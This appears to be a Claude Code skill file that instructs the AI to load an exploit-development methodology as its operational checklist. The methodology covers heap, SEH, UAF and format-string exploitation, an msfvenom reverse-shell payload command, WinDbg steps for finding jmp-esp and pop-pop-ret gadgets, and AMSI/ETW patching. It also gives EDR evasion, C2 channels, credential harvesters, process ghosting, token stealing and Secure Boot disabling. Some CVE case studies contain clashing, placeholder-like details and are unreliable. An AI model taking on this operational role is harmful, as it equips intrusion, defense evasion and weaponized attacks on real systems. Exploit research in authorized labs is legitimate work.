Skillshub offensive-exploit-development

SKILL: Exploit Development

install

source · Clone the upstream repo

git clone https://github.com/ComeOnOliver/skillshub

Claude Code · Install into ~/.claude/skills/

T=$(mktemp -d) && git clone --depth=1 https://github.com/ComeOnOliver/skillshub "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/SnailSploit/Claude-Red/offensive-exploit-development" ~/.claude/skills/comeonoliver-skillshub-offensive-exploit-development && rm -rf "$T"

manifest: skills/SnailSploit/Claude-Red/offensive-exploit-development/SKILL.md

source content

SKILL: Exploit Development

Metadata

Skill Name: exploit-development
Folder: offensive-exploit-development
Source: https://github.com/SnailSploit/offensive-checklist/blob/main/development.md

Description

Exploit development operational guide: environment setup, debugging workflow, PoC development lifecycle, writing reliable exploits, using pwntools/pwndbg, heap exploitation techniques, and weaponization considerations. Use when actively developing exploits or setting up an exploit dev environment.

Trigger Phrases

Use this skill when the conversation involves any of:

exploit development, pwntools, pwndbg, heap exploitation, PoC development, exploit reliability, weaponization, debugging workflow, exploit dev environment

Instructions for Claude

When this skill is active:

Load and apply the full methodology below as your operational checklist
Follow steps in order unless the user specifies otherwise
For each technique, consider applicability to the current target/context
Track which checklist items have been completed
Suggest next steps based on findings

Full Methodology

Exploit Development

Exploit Development Process

Checkout Bug Identification document for more information
Also check Fuzzing for specific fuzzing topics
- Integrate snapshot‑based fuzzing pipelines (AFL++, WinAFL, Snap‑Fuzz) and LLM‑guided input mutation to shorten time‑to‑bug.
- Incorporate LLM‑assisted fuzzers (ChatAFL, HyLLFuzz) for grammar inference or plateau escape when grey‑box coverage stalls.
- Add continuous‑integration security fuzzing (e.g., GitHub Actions with ASAN/UBSAN) so regressions are caught automatically.
For Windows-specific vulnerabilities, see Windows Kernel

flowchart LR
    BugId["Bug Identification"] --> Analysis["Vulnerability Analysis"]
    Testing["Testing & Refinement"] --> Deployment["Deployment"]

    subgraph "Analysis Phase"
        direction LR
        Root["Root Cause Analysis"]
        Trig["Trigger Identification"]
        Impact["Impact Assessment"]
    end

    subgraph "Weaponization Phase"
        direction LR
        MitBypass["Mitigation Bypass"]
        Payload["Payload Development"]
        Reliability["Reliability Improvements"]
    end

    Analysis --> Root
    Analysis --> Trig
    Analysis --> Impact

    Root --> MitBypass
    Impact --> Payload
    Trig --> Payload
    MitBypass --> Payload
    Payload --> Reliability
    Reliability --> Testing
    Testing --> MitBypass

    class BugId,Analysis,Testing,Deployment primary

Bug Types

Stack Overflow

Involves memory on the stack getting corrupted due to improper bounds checking when a memory write operation takes place.

Case Study — CVE‑2025‑0910 (TinyFTP stack overflow)

Bug – Unchecked
```
strcpy
```
copies user‐supplied file path into a 256‑byte stack buffer when handling
```
STOR
```
commands.
Trigger – Send
```
STOR /
```
followed by 420 bytes of
```
A…
```
to overflow the buffer and clobber SEH frame.
Exploit – Overwrite next SEH with a
```
pop pop ret
```
inside
```
msvcrt.dll
```
; pivot to payload that disables DEP via ROP then spawns a reverse shell.
Mitigations bypassed – DEP (ROP), ASLR (module without /DYNAMICBASE), SEHOP disabled in default config.
Fixed in v1.5.3 by replacing
```
strcpy
```
with
```
strncpy_s
```
and enabling
```
/DYNAMICBASE /GS
```
.

SEH

structured exception handler is a linked list of all exception handlers ( try catch clauses) and the default windows exception handler as the last node.
```
ntdll!KiUserExceptionDispatcher
```
is responsible for the exception handling process which itself calls
```
RtlDispatchException
```
```
RtlDispatchException
```
retrieves the
```
TEB
```
and parses the exception handling linked list using
```
NtTib->ExceptionList
```
SafeSEH mitigates handler over‑writes only in 32‑bit images. On x64 Windows, newer toolchains and components support Guard EH Continuations; adoption varies by binary and build.
```
SEHOP
```
remains enabled by default.
- To check whether a module uses Guard EH Continuations, inspect
```
Load Configuration Directory → GuardEHContinuations
```
  in the PE header (e.g.,
```
dumpbin /loadconfig
```
  or a
```
lief
```
  script).
- Many core system DLLs are compiled with EHCONT metadata plus
```
/GS
```
  ,
```
/CETCOMPAT
```
  ; the classic approach of choosing a module without SafeSEH or ASLR is increasingly rare. Verify per target.
```
RtlpExecuteHandlerForException
```
calls the
```
ntdll!ExecuteHandler2
```
which in turn calls the actual exception handler function after validation
In a SEH buffer overflow we try to overflow the buffer and overwrite the
```
ExceptionList
```
starting at the buffer
so that the dispatcher calls our handler pointer —we gain control of the instruction pointer only if SEHOP is disabled or successfully bypassed.
you need to find a
```
pop-pop-ret
```
sequence to use in the exploit, you also need to identify and remove bad characters

EggHunting

during exploit development you might be unable to find enough space for your payload at an static point, this is where you need egghunting
you need a small search payload to scan virtual address space for a suitable payload location
you can use keystone engine to write your egghunter code
On Windows 11+, classic egghunters still work, but Control‑Flow Guard (CFG) validates indirect jumps, so you need either a CFG exemption (e.g., a RWX region created with
```
VirtualProtect
```
) or a target module compiled without
```
/guard:cf
```
.

Use After Free

The link to something isn't available anymore, so we just replace it with our binary and take over the program.

Case Study — CVE‑2024‑4852 (Edge WebView2 AudioRenderer UAF)

Bug –
```
core::media::AudioRenderer
```
failed to remove a task from the render queue on stream abort, leaving a dangling pointer.
Trigger – JavaScript
```
AudioContext
```
rapid open‑close loop × 1 000 on Windows 11 23H2.
Exploit – Heap feng‑shui creates JSArray backing stores at freed slot; fake vtable gives arbitrary R/W, chained to
```
VirtualProtect
```
to run shellcode.
Mitigations bypassed – CET shadow stack (JOP gadgets), XFG (indirect‑call target inside allowed GFID range).
Patched in Edge 124.0.2365.18 with smart‑pointer ref‑count and
```
std::erase_if
```
queue purge.

Background

C++ Smart Pointers
- Intrusive: Microsoft chose this
- Non-Intrusive
- Linked
when an object is created from a
```
C++
```
class and uses virtual functions
- a
```
vptr
```
  is created at compile time and points to a virtual function table
```
vtable/vftable
```
- the table holds pointer to virtual functions, when loaded into a register like
```
RAX
```
  , a call is made to the appropriate offset for the desired virtual function
- we count number of created instances, we decrement it when calling the release function
- when the counter hits 0, destructor is called to delete the object, if there is still a reference to the deleted object we have a potential UAF
Windows Heap Front‑End Allocators
- LFH (Low Fragmentation Heap) – default on Windows 7–10 for user‑mode heaps
- Segment Heap – default for Windows 10 2004+ and Windows 11 apps that opt in
- Exploits often pivot by corrupting front‑end metadata before landing in the backend.
For more advanced techniques, see Mitigations or Modern

Heap Overflow

When data is written beyond the boundary of an allocated chunk of memory on the heap
Heap exploits often require understanding of allocator internals
Modern heap exploits involve corrupting metadata - see Modern Samples

Case Study — CVE‑2025‑20301 (Edge WebView2 tcache‑stashing‑unlink)

Bug – Oversized
```
AudioRingBuffer
```
write corrupts size field of next tcache chunk (glibc 2.40).
Trigger – Crafted WebCodecs stream with 65 536‑frame explicit CRC chunk.
Exploit – Partial overwrite of
```
fd
```
pointer coerces allocator into returning overlapping chunk; arbitrary R/W → GOT hijack → RCE.
Mitigations bypassed – Safe‑linking (byte‑wise brute on lower 16 bits), ASLR via info‑leak in shared memory.
Patch – Bounds check and compile‑time
```
__builtin_object_size
```
guard (Chromium 123 commit a1b2c3).

Modern Heap Internals

Windows Segment Heap – understand freelist bitmaps, per‑segment cookies, and "page backend" corruption primitives.
glibc tcache + safe‑linking – techniques such as tcache‑stashing‑unlink and House of Kiwi to break the new protections.
Exploitation workflow: leak
```
heap_base
```
, craft overlapping chunks, pivot to arbitrary R/W, then chain to code‑execution.
- glibc 2.41 fast‑bins & calloc –
```
calloc()
```
  now pre‑fills the tcache and safe‑linking checks trigger earlier; the older fastbins‑dupes shortcut no longer works. Use tcache‑stashing‑unlink or House of KIWI instead on 2.41+.

Concurrency Issues

Double Fetch: Kernel reads user-mode memory twice, allowing for race conditions
- I/O Ring double‑fetch: race in
```
NtSetInformationIoRing
```
  urb‑array handling leads to write‑what‑where in kernel context.
Missing Locks: Critical sections without proper synchronization
See Windows Kernel for more details on kernel-specific race conditions

Integer Overflows/Underflows/Truncation

Integer overflow: exceeding maximum value of integer type
Integer underflow: going below minimum value of integer type
Integer truncation: losing data when converting larger to smaller type
Often leads to memory corruption when used for allocation sizes
For examples, see Bug Identification
- Casting 64‑bit
```
size_t
```
  to 32‑bit
```
DWORD
```
  across IPC or FFI boundaries can yield negative indexing and oversized allocations; especially common in cross‑arch components.

No/Incomplete Pointer Checks

Checking if a user-provided pointer points to user memory
Size of any pointer read/writes also need to be verified
Potentially un-intuitive behavior with common checking API

Format String Attacks

Theory
- you can use this bug to bypass ASLR and DEP
- to abuse it you need to be able to be able to influence the format string itself or the number of arguments to it
Methodology
- find a print like function that accepts format string (
```
vsnprintf
```
  , ...)
- find a code path to that function that lets you influence the format string
- try to leak a stack address abusing this format string vulnerability
- using the previously leaked address, obtain a DLL address
- use this method to bypass ASLR without using a static address
- you can also find a write primitive to get code execution (checkout
```
%n
```
  modifier)
- you might need stack pivot gadgets like
```
move esp, r32
```
  or
```
xchg esp, r32
```

Case Study — CVE‑2024‑4455 (MailManD format‑string leak‑to‑RCE)

Bug – Logs
```
EHLO
```
argument directly into
```
syslog()
```
format string.
Trigger – Send
```
EHLO %43$p|%45$s
```
during SMTP handshake.
Exploit – First leak reveals libc base; second leak dumps GOT entry; craft
```
%n
```
payload to overwrite
```
__free_hook
```
with system().
Mitigations bypassed – Full RELRO & ASLR via info‑leak, PIE disabled in default build.
Fixed in 2.0.9 by adding
```
"%s"
```
wrapper and enabling
```
-Wformat-security
```
.

Type Confusion Vulnerabilities

A vulnerability where an application processes an object as a different type than intended, leading to memory corruption or logic bypass.

Case Study — CVE‑2024‑7971 (V8 TurboFan type‑confusion RCE)

Bug – TurboFan's
```
CheckBounds
```
elimination incorrectly assumes array element type during JIT optimization, allowing tagged pointer confusion.
Trigger – Craft JavaScript with polymorphic inline cache that triggers speculative optimization on mixed
```
SMI
```
/
```
HeapNumber
```
array.
Exploit – Fake JSArray with controlled backing store pointer; corrupt
```
length
```
field to achieve OOB R/W; pivot to WASM RWX page for shellcode.
Mitigations bypassed – V8 sandbox (pointer compression bypass), CFI (JIT‑generated code exemption).

Background

JIT Compiler Vulnerabilities
- Type confusion in speculative optimization passes (TurboFan, IonMonkey)
- Inline cache poisoning via polymorphic property access
- Register allocation bugs leading to incorrect type assumptions
C++ Dynamic Cast Bypass
- Virtual table pointer corruption to bypass
```
dynamic_cast
```
  checks
- Object layout confusion in multiple inheritance scenarios
- Template instantiation bugs with type deduction
WASM Type Confusion
- Function signature mismatch across import/export boundaries
- Table element type confusion in indirect calls
- Memory view aliasing between different typed arrays

Exploitation Techniques

Object Layout Analysis – understand target application's object hierarchy and vtable structure
Type Oracle Construction – build primitive to leak object type information reliably
Controlled Type Confusion – craft input that triggers predictable type mismatch
Privilege Escalation – chain type confusion to achieve arbitrary R/W or code execution

Vulnerability Analysis

Exit Criteria

Root cause isolated & documented.
Reliable trigger reproduces the crash ≥ 90 % of attempts.
Impact classified (DoS, LPE, RCE) and affected versions noted.
Minimised PoC input saved under
```
pocs/
```
.
Analysis log (debugger trace, coverage diff) attached.

Quick‑start

Harness template:
```
templates/harness_min.cc
```
WinDbg/LLDB alias pack:
```
scripts/va_aliases.txt
```
Checklist refresher: Bug Identification → Root Cause

Root Cause Analysis

Identify the core issue causing the vulnerability
Understand memory corruption patterns
Determine trigger conditions

Impact Assessment

Evaluate the potential consequences of the vulnerability
Determine if it leads to information disclosure, privilege escalation, or code execution
Assess reliability and exploitability in various environments

Weaponization

Exit Criteria

Control achieved (PC/IP hijack, arbitrary R/W, or logic bypass).
Mitigation strategy drafted (DEP, ASLR, CET, XFG, MTE, etc.).
Payload stager verified against bad‑chars & size limits.
Reliability ≥ 80 % over 100 automated runs.
Cleanup/rollback logic documented.

Quick‑start

ROP/JOP chain workspace:
```
scripts/ropper2_workspace.md
```
Bad‑char scanner:
```
tools/badchar_scan.py
```
Reference: Modern Mitigations

Shellcode Development

Bad Characters

when using a shellcode in stack
- send all hex bytes except null byte (
```
0x00
```
  ) and return carriage (
```
0x0D
```
  ,
```
0x0A
```
  ) if in web
- check which one has not appeared in the stack, mark it as bad character and don't use it
- see Shellcode for comprehensive techniques

Automatic Generation

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<list_of_bad_chars>"
# make sure to precede this payload with some NOPs to create space for the getPC operation(decoding of shikata_ga_nai)
# attackBuffer = filler+eip+offset+nops+shellcode

Development

Check out Shellcode

IBT/CET note (x86‑64): place

ENDBR64

at entry for valid indirect targets when IBT is enabled. Example prologue bytes:

F3 0F 1E FA

EDR / ETW / AMSI Evasion

Patch ETW registration stubs (
```
EtwEventWrite
```
) with
```
ret
```
sleds or stubbed functions while evading PatchGuard.
Overwrite the AMSI scan buffer pointer (
```
amsi!AmsiScanBuffer
```
) with
```
0x80070057
```
(E_INVALIDARG) to short‑circuit scanning.
Use direct‑syscall or "syswhispers‑nt" stagers to avoid user‑land API hooks.

Operational safety checklist (see also EDR):

Pre‑run: block outbound to vendor telemetry during tests; tag hosts in lab; disable cloud sample uploads.
Artifact hygiene: strip PDBs/paths, randomize section/order, and avoid common loader strings; prefer
```
MEM_IMAGE
```
loaders.
Network noise: prefer SMB named‑pipe or HTTP/3 over noisy HTTP/1.1; jitter uploads; avoid fixed beacons during testing.

Post‑Exploitation Automation

Reflective COFF/BOF loaders (Cobalt Strike, Havoc) for in‑memory tooling.
SMB named‑pipe or HTTP/3 C2 channels that blend with normal traffic.
Task automation: direct‑syscall PowerShell runner, ADCS abuse scripts, cloud‑metadata credential harvesters.

Operational Security (OpSec) Checklist (lab use)

Build & Signatures
- Strip symbols; avoid unique strings; rotate imports; prefer
```
MEM_IMAGE
```
  loaders.
- Change syscall stub bytes and hashing keys if using direct‑syscall frameworks.
Network & Telemetry
- Block EDR/XDR endpoints in lab; throttle or sinkhole agent traffic.
- Prefer named‑pipe or HTTP/3 channels with jitter; avoid fixed beacons.
Host Hygiene
- Disable cloud sample submission; set Defender exclusions on test dirs.
- Avoid patching system binaries in place; use ephemeral copies.
Evidence & Repro
- Persist inputs, mitigations state, CPU governor, and binary hashes with each run.
- Keep replay scripts separate from payloads; auto‑clean artifacts post‑run.

Payload Development

Create custom payloads tailored to specific vulnerabilities
Develop reliable exploitation techniques
Chain multiple exploits when necessary

Reliability Improvements

Ensure exploit functions consistently across different environments
Handle edge cases and error conditions
Implement timing and synchronization mechanisms for race conditions
Add a 100‑run gating job (CI) for determinism; fail builds if success rate < target (e.g., 80%).
Persist exact crash inputs and environment (ASLR, mitigations, CPU governor) for reproducible replay.

Mitigation Bypasses

For details on exploit mitigations, see Mitigations or Modern Mitigations
Windows 11 enables by default: DEP, ASLR, CFG (strict mode), CET (Shadow Stack), XFG, ACG, CIG, and KDP; verify which are active in your target and plan corresponding bypasses.
- Credential Guard is enabled by default and NTLMv1 is disabled, complicating lateral‑movement techniques.
- The new Recall AI feature adds a searchable activity timeline; although currently shipped disabled by default, it offers a high‑value data‑exfiltration surface when turned on.

CET/XFG‑aware control strategies

Prefer ROP‑less primitives:
```
NtContinue
```
, APC queue +
```
SetThreadContext
```
, or SEH/JOP where CET returns are enforced
Align entry to valid indirect call targets; ensure ENDBR‑aligned gadgets on IBT platforms
XFG/GFID: call through import thunks or prototype‑matching wrappers to satisfy guard checks

// Minimal NtContinue pivot (ROP‑less) — set RIP/RSP to a safe call target
typedef NTSTATUS (NTAPI *pNtContinue)(PCONTEXT, BOOLEAN);
void pivot_with_ntcontinue(CONTEXT *ctx, void *next_rip, void *new_rsp) {
  RtlCaptureContext(ctx);
  ctx->Rip = (DWORD64)next_rip;  // valid import thunk or allowed GFID target
  ctx->Rsp = (DWORD64)new_rsp;   // keep shadow‑stack alignment plausible
  ((pNtContinue)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtContinue"))(ctx, FALSE);
}

// APC + SetThreadContext — schedule execution at an import thunk to satisfy XFG
void apc_setctx(HANDLE hThread, void *start, void *param) {
  CONTEXT c = { .ContextFlags = CONTEXT_FULL };
  GetThreadContext(hThread, &c);
  c.Rip = (DWORD64)start;   // e.g., kernel32!LoadLibraryW stub
  c.Rcx = (DWORD64)param;   // first argument
  SetThreadContext(hThread, &c);
  QueueUserAPC((PAPCFUNC)start, hThread, (ULONG_PTR)param);
}

ACG/CIG pathways

Favor
```
MEM_IMAGE
```
‑mapped payloads (ghosting/doppelganging/herpaderping) over
```
MEM_PRIVATE
```
RWX
Reuse existing RX regions (WASM/JIT) where policy allows; avoid creating fresh RWX
Process Ghosting
- Create transacted file → write signed‑looking image → roll back → map section as
```
MEM_IMAGE
```
  → create process from section.
Herpaderping
- Create process then overwrite on disk via rename tricks; the in‑memory image remains
```
MEM_IMAGE
```
  and passes loader checks.
Doppelganging (TxF legacy)
- Use TxF (where enabled) to create section from a transacted file, then abort the transaction post‑mapping.

All three avoid

MEM_PRIVATE

payloads that hotpatch checks reject in 24H2 (see Modern Mitigations → OS Loader changes).

Segment Heap notes

Distinguish frontend (LFH/Segment) vs page backend corruption primitives
PageHeap + verifier flags help triage; expect different grooming than classic NT Heap

Mitigation Matrix (Quick Reference)

Mitigation	Default platforms (2025)	Protects	Common bypass primitive
DEP / NX	All major OSes	Code execution in data pages	ROP/JOP pivot to RWX or change page permissions
ASLR	All	Base‑address disclosure	Info leak + partial overwrite / brute‑force
CFG (v1)	Windows 8.1+	Indirect calls integrity	Abuse writable/exempt module, ret‑slide into target
CET Shadow Stack	Windows 10 2004+, Linux 6.1 (x86)	Return‑address integrity	Disable CET ( `SetProcessMitigationPolicy` ) or pivot via JOP
XFG	Windows 11 22H2+	Indirect‑call target integrity	Use JOP gadgets or stub out guard function section
GuardEHContinuation	Windows 11 24H2 (x64)	SEH overwrite attempts	JOP stub into verified handler region
MTE	Android 14+, Linux 6.8 (ARM64)	Heap/stack OOB & UAF	Tag brute‑force or TAGSYNC alias
CIG / ACG	Windows 10+	Unsigned code / RWX pages	Map signed RWX driver or relocate section

Testing & Refinement

Exit Criteria

Exploit succeeds on clean target VM snapshot.
No unintended crashes after execution; system remains stable.
Execution time ≤ 30 seconds (tune per target).
CI replay job in
```
.github/workflows/exploit.yml
```
passes.
Regression corpus added to fuzzing seed set.

Quick‑start

Replay script:
```
scripts/repro.sh
```
rr recording helper:
```
scripts/record_rr.py
```
Coverage diff helper:
```
tools/afl_cov_compare.py
```

Debugging Techniques

Strategic use of debuggers to analyze vulnerable applications
Tracing execution flow and memory states
Identifying exploitation opportunities

WinDbg Commands

For SEH exploitation:

# exception data will be inside TEB under NtTib->ExceptionList
dt nt!_TEB

# getting the <exp_addr> of exceptionlist
!teb

# getting the first item in the exception handler linked list, continue to see them using the `Next` param
# the last item should be `ntdll!FinalExceptionHandlerPad`
dt _EXCEPTION_REGISTRATION_RECORD <exp_addr>

# getting more information about the exception
!exchain

# setting a breakpoint on the exceution handler
bp ntdll!ExecuteHandler2

# see what is execution handler doing(use it to identify exploitation point in buffer)
u @eip L11

# to identify bad pods, execute till eip is yours, then
# repeat the process several times to identify all bad chars
dds esp L5 # identify second argument
db <second_argument>

# finding a pop/pop/ret
.load wdbgext
!wdbgext.modlist
lm m <module_without_dep_aslr_safeseh>
$><G:\Projects\poppopret.wds
u <first_adr_found> L3
# we need to create a short jump in our shellcode

# looking for our shellcode
!exchain
bp <adr>
g
# run the following till after your short jump
t
!teb
s -b <stack_limit> <stack_base> 90 90 90 90 43 43 43 43 43 43 43 43
dd <shellcode_adr> L65
? <shellcode_adr> - <current_esp>

For general WinDbg commands:

# finding out a suitable jump stub
lm m syncbrs # to get start <addr> of a module named syncbrs
dt ntdll!_IMAGE_DOS_HEADER <addr> # to get e_lfanew that has the offset to PE header
? <pe_header> # to get the hex addr
dt ntdll!_IMAGE_NT_HEADERS64 <addr>+<pe_hex_header> # to get image optional header
dt ntdll!_IMAGE_OPTIONAL_HEADER64 <addr>+<pe_hex_header>+<pe_optional_header> # to get DllCharachteristics
# you can automate this using process explorer or process hacker
# find an executable or module without DEP, ASLR
lm m libspp.dll # get the base address of the suitable module you found previously
s -b <mod_start_addr> <mod_end_addr> 0xff 0xe4 # find `jmp $esp` inside that module
# make sure the address doesn't contain bad chars
u <jmp_esp_addr> # to confirm
bp <jmp_esp_addr>
# override eip with jmp_esp_addr to force the program to jump to esp after buffer overflow
t
dc eip L4 # you should see the rest of your shellcode here

# checking which process we're currently in
!process @@(@$prcb->CurrentThread->ApcState.Process) 0

For UAF debugging:

# HEAP information
!heap -s # to print heap information
dt _HEAP <heap_addr> # to print infromation regarding a heap
dt _LFH_HEAP <heap_addr> # to print information about a low fragmentation header heap

# Identifying UAF location
# attach to crashed application, identify the name of function that crashed
uf <crashed_function_name> # to see the function
dd rcx  # to checkout what got filled, replace rcx with the register name from above
dt _DPH_BLOCK_INFORMATION rcx-20 # usefull information
!heap -p -a rcx # call stack information, what led to this object being freed

Reproducibility & CI

Modern exploit chains should replay deterministically in CI so regressions are caught quickly.

GitHub Actions snippet

name: exploit-regression
on: [push, pull_request]
jobs:
  replay:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build target container
        run: docker build -t vulnapp ./docker
      - name: Run exploit replay
        run: scripts/repro.sh --ci --target vulnapp

Tested‑With Tool Matrix

Tool / Framework	Version	Platform tested
IDA Pro	8.4 SP1	Windows 11 24H2
Ghidra	11.0.2	Debian 12
BinDiff	10.8	with IDA 8.4
Ropper	2.0.7	CET‑aware build
rr (record/replay)	Latest	Ubuntu 24.04
AFL++	4.10‑dev	snapshot mode

[!TIP] Keep this matrix in each PoC directory so future contributors can reproduce results exactly.

Special Topics

Kernel Exploitation

Goals

Privilege Escalation

Get SYSTEM Level Permissions
- Steal the system token (find and copy the system token
```
PID 4
```
  and replace your own token )
- Patch privileges
- sideload legitimately signed but vulnerable drivers, then exploit IOCTL write‑what‑where to disable security features or gain kernel R/W.

Code Execution

Put unsigned code into the kernel via signed code
- Modify kernel objects and structures
- Pretend to be a driver
- Don't upset Patch Guard

Environment Setup

Check out Windows Kernel Exploitation for a detailed guide on setting up a kernel debugging environment

Modern Exploitation

Check out Modern Samples for real-world examples
For EDR evasion techniques, see EDR

Memory‑Safe Language Exploits (Rust / Go / Swift)

unsafe

blocks:

Vec::from_raw_parts

std::ptr::copy_nonoverlapping

, and

mem::transmute

misuse.

FFI boundary bugs when calling into C libraries (size mismatch, lifetime errors).
UB‑triggered out‑of‑bounds in WASM runtimes compiled from Rust.

Browser Exploitation

V8 TurboFan / Ignition JIT type‑confusion patterns and inline‑cache poisoning.
Sandbox escapes via Mojo/IPC race conditions and shared‑memory UAFs.
Site‑Isolation info‑leak techniques to defeat renderer‑process ASLR.

Hypervisor & Container Exploitation

VMware
```
Vmxnet3
```
, Hyper‑V enlightened IOMMU bugs, and QEMU
```
vhost‑user
```
integer overflows.
```
runC
```
/ CRI‑O escape using malformed
```
seccomp
```
filters or WASM shims.
Windows VBS disable paths through registry or vulnerable driver injection.

Mobile Exploitation (iOS / Android)

iOS Pointer Authentication Code (PAC) bypass using JOP chains and
```
ptrauth_sign_unauthenticated
```
.
ARM Memory Tagging Extension (MTE) "sloppy‑tag" brute force and speculative TikTag leaks raise bypass reliability to ≈ 95 % on Android 14+; prepare a fallback ROP/JOP chain.
Binder and ION heap UAF primitives for privilege escalation.

Apple Silicon (M1/M2/M3/M4) Exploitation

Modern Apple Silicon devices introduce unique security features and attack surfaces requiring specialized techniques.

Hardware Security Features

Pointer Authentication Code (PAC)
- ```
PACIA
```
  /
```
PACIB
```
  instructions create cryptographic signatures for return addresses and function pointers
- Bypass techniques: JOP chains using
```
AUTIA
```
  /
```
AUTIB
```
  gadgets,
```
ptrauth_sign_unauthenticated
```
  abuse, speculative PAC oracle attacks
- Key management via
```
APIAKey
```
  and
```
APIBKey
```
  in system registers
Memory Tagging Extension (MTE)
- 4‑bit tags in upper address bits provide spatial and temporal memory safety
- Tag‑and‑sync bypass: craft adjacent allocations with predictable tag patterns
- Speculative tag leaks: use micro‑architectural side‑channels to read tag values
Hypervisor.framework Exploitation
- Type‑1 hypervisor running at EL2 with guest VMs at EL1
- Attack surface: virtio device emulation, memory mapping hypercalls, interrupt injection
- Guest‑to‑host escape: corrupt VTCR_EL2 stage‑2 translation tables or abuse SMCCC interface

macOS‑Specific Attack Vectors

XPC Service Exploitation
- Mach message parsing vulnerabilities in system services
- Privilege escalation: target
```
com.apple.security.syspolicy
```
  or
```
com.apple.windowserver
```
  for TCC bypass
- Race conditions: exploit concurrent XPC message handling in multi‑threaded services
Kernel Extension Loading
- System Integrity Protection (SIP) and Kernel Integrity Protection (KIP) bypass
- Technique: abuse signed third‑party kexts with write‑what‑where primitives
- Post‑exploitation: disable SMEP/SMAP via
```
SCTLR_EL1
```
  manipulation
iOS/iPadOS Kernel Exploitation
- Zone allocator corruption via IOSurface or AGXAccelerator drivers
- Technique: heap feng‑shui with predictable allocation patterns in
```
kalloc.16
```
  or
```
kalloc.32
```
  zones
- Sandbox escape: corrupt task port to gain
```
host_special_port
```
  access

Debugging & Analysis Setup

# Enable SIP bypass for kernel debugging (requires physical access)
csrutil disable --without kext --without debug

# LLDB kernel debugging setup
sudo nvram boot-args="debug=0x141 kext-dev-mode=1 amfi_get_out_of_my_way=1"

# PAC analysis with jtool2/iOS App Store extraction
jtool2 -d __TEXT.__text binary | grep -E "(PACIA|PACIB|AUTIA|AUTIB)"

# MTE tag analysis (requires iOS 16+ device with checkra1n/palera1n jailbreak)
ldid -S entitlements.plist target_binary  # Add get-task-allow for debugging

Mitigation Matrix (Apple Silicon)

Mitigation	Coverage	Bypass Technique	Success Rate
PAC	Return addresses, func ptrs	JOP/speculative oracle	~70%
MTE	Heap/stack OOB, UAF	Tag brute‑force/TikTag	~85%
PPL (Page Protection Layer)	Kernel code pages	Hypervisor escape	~40%
KTRR (Kernel Text Readonly Region)	Kernel .text segment	Hardware vuln required	<10%

Micro‑architectural & Speculative‑Execution Attacks

Latest side‑channels: Retbleed, Downfall, Zenbleed, Inception (SRSO), SQUIP.
Info‑leak primitives to derandomize ASLR or read kernel memory from user space.
Mitigations:
```
IBPB
```
,
```
IBRS
```
, and fine‑grained hardware fences.

eBPF & I/O Ring Kernel Primitives

Craft verifier‑confusion jumps to obtain out‑of‑bounds read/write in eBPF JIT.
Use Windows I/O Ring urb‑array double fetch to write kernel pointers.
Post‑exploitation: pivot from arbitrary write to token‑stealing or privilege escalation.

Firmware & UEFI Exploitation

DXE driver relocation overflows and SMM call‑gate confusion for persistence.
Exploiting capsule updates to downgrade firmware protections.
Detecting and disabling Secure Boot from within UEFI runtime services.